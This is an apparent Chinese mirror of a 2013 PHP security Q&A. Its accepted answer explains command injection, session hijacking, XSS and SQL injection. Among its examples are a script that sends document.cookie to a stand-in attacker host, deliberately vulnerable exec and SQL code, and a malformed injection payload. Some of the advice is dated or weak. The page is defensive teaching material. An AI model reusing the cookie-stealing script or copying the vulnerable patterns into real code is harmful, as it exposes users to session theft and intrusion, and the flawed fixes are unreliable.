dongya4089 2013-01-01 15:27
浏览 42
已采纳

从XSS攻击中保护PHP会话[关闭]

I've been reading a lot of articles on owasp.org and one of things that I remember most and couldn't understand well is securing PHP sessions.

I couldn't understand well how securing sessions goes and therefore I am asking here. What are the best way to secure sessions in PHP?

Side question: Are file inputs vulnerable by XSS?

This is the source for PHP sessions hijacking: OWASP.org: PHP Security Cheat Sheet

  • 写回答

3条回答 默认 最新

  • doushe8577 2013-01-01 16:15
    关注

    Here are some of the major issues to keep in mind:

    Not validating user input

    Suppose you have a web page that allows user to see the contents of a folder (for example your a hosting company and showing the user their files on the server)

    Here is some code that might make it happen:

    $directory = $_GET['directory'];
    
    exec("ls $directory", $result);
    

    An attacker can exploit this by passing in other commands in to the url string, such as:

    ls -LR
    

    Session Hijacking

    Each session has a unique ID, if an attacker gets a hold of it they can (potentially) use it to obtain confidential information.

    To protect against this have the user reauthenticate (with their passwords) before doing anything sensitive (for example, if the user wants to reset their password, force them to enter the old password first)

    XSS (cross site scripting attack)

    Whenever you have a site with user generated content (a good example of this is comments on a blog), there is a potential threat that an attacker will place javaScript in to his content (read: his comment) that could potentially harm all users that come to the page.

    Here is an example:

    <script> 
        document.location = 'http://www.hackingYou.com/stealYourData.php?' + document.cookie; 
    </script>
    

    This code will allow the attackers website (hackingYou.com) to steal the cookie that you have for the website you are currently visiting.

    One way to protect against this is to remove any HTML from any string being inputted using the following command:

    strip_tags($input);
    

    SQL Injection

    (wouldn't be a decent answer without this one)

    Suppose you have a web page that logs in users to a site. In order to log them in successfully you check for their record in a DB.

    Here is how it might be coded:

    $sql = "SELECT * FROM users WHERE username = $_GET['username'] and password = $_GET['password']";
    

    An attacker can exploit this by entering in to the password field:

    abcd OR WHERE 1 = 1
    

    The resulting sql statement would look like this:

    SELECT * FROM users WHERE username = hacker AND password = abcd OR WHERE 1 = 1;
    

    This would spit out the full table of ALL usernames and passwords to the attacker.

    To protect against this "sanitize" your input strings for SQL using the following command:

    mysql_real_escape_string($input) 
    

    This is most of the basics, obviously one should always keep up to date by reading the latest security bulletins, such as:

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(2条)

报告相同问题?

悬赏问题

  • ¥15 有没有会使用flac3d软件的家人
  • ¥20 360摄像头无法解绑使用,请教解绑当前账号绑定问题,
  • ¥15 docker实践项目
  • ¥15 数电几道习题,写出作答过程,ai一律不采用
  • ¥15 利用pthon计算薄膜结构的光导纳
  • ¥15 海康hlss视频流怎么播放
  • ¥15 Paddleocr:out of memory error on GPU
  • ¥30 51单片机C语言数码管驱动单片机为AT89C52
  • ¥100 只改动本课件的 cal_portfolio_weight_series(decision_date), 跑完本课件。设计一个信息比率尽量高的策略。
  • ¥20 如何在visual studio 2022中添加ImageMagick库